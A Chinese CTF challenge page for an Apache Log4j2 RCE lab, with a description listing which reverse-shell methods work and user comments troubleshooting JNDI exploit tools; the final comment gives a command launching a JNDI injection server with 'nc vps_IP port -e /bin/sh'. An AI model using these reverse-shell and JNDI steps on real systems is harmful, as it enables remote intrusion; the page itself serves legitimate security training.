Apache Log4j2 RCEWEB 未解决
分数:
25
金币:
3
题目作者:
云牧青
一 血:
yeedo
一血奖励:
8金币
解 决:
503
提 示:
人太多了服务器性能有点满了,启动不起来的 过一会再启动就可以了。
描 述:
/bin/bash:x ;
/bin/sh √ ;
/dev/tcp × ;
nc -e x ;
nc a.cc 1234 -e √ ;
评论
lotuswhite 5月前
举报
不知道为什么,作者大大wp里的JNDIExploit-1.2-SNAPSHOT.jar反弹shell不成功,但是百度大佬wp里的JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar成功了。我的6金币呜呜
genius4282 1年前
举报
裂开,不如自己搭建个本地的复现效率高,同样的步骤,在这里就搞不了还麻烦
ctfliu 1年前
举报
不懂,跟着流程走的。阿里云开启虚拟linux,在安全组规则放开所有端口。根据别人的wp走就行。
xiaopengy 1年前
举报
请问反弹shell的时候vps端为什么报这个错? 我的vps机是kali的系统。 java.lang.IllegalAccessError: superclass access check failed: class com.feihong.ldap.template.TomcatEchoTemplate (in unnamed module @0x5e91993f) cannot access
Striker123456 1年前
举报
弹回的shell执行不了命令,不知道是不是我的服务器的问题
jack12138 1年前
举报
dnslog出不来,但是可以弹shell,估计是禁用dns请求啦?
Wencf01 9月前
举报
我也是能弹shell,但是弹不dnslog
Striker123456 2年前
举报
必须要外网的VPS么
Striker123456 1年前
举报
@简单的很遗憾 哎哎,我的意思是公网地址的VPS也可以把
简单的很遗憾 2年前
举报
这个是需要的,没有vps可以vulhub本地复现嘛
1317554973 2年前
举报
什么靶场啊 我都用了6金币都没成功 我百度上找一个靶场就直接成功了 骗我金币 搞毛啊
13633953641aaa 2年前
举报
有没有师傅遇到vps开启ldap后 telnet -p 不通的问题
SecI302 2年前
举报
1.通过ceye是无法判断是否存在漏洞的,但是能正常反弹shell 2.下载JNDI注入工具 3. 启动工具命令java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "nc vps_IP port -e /bin/sh" -A vps_IP启动rmi或者ldap服务设置IP工具会返回服务地址的(红色的) 4.复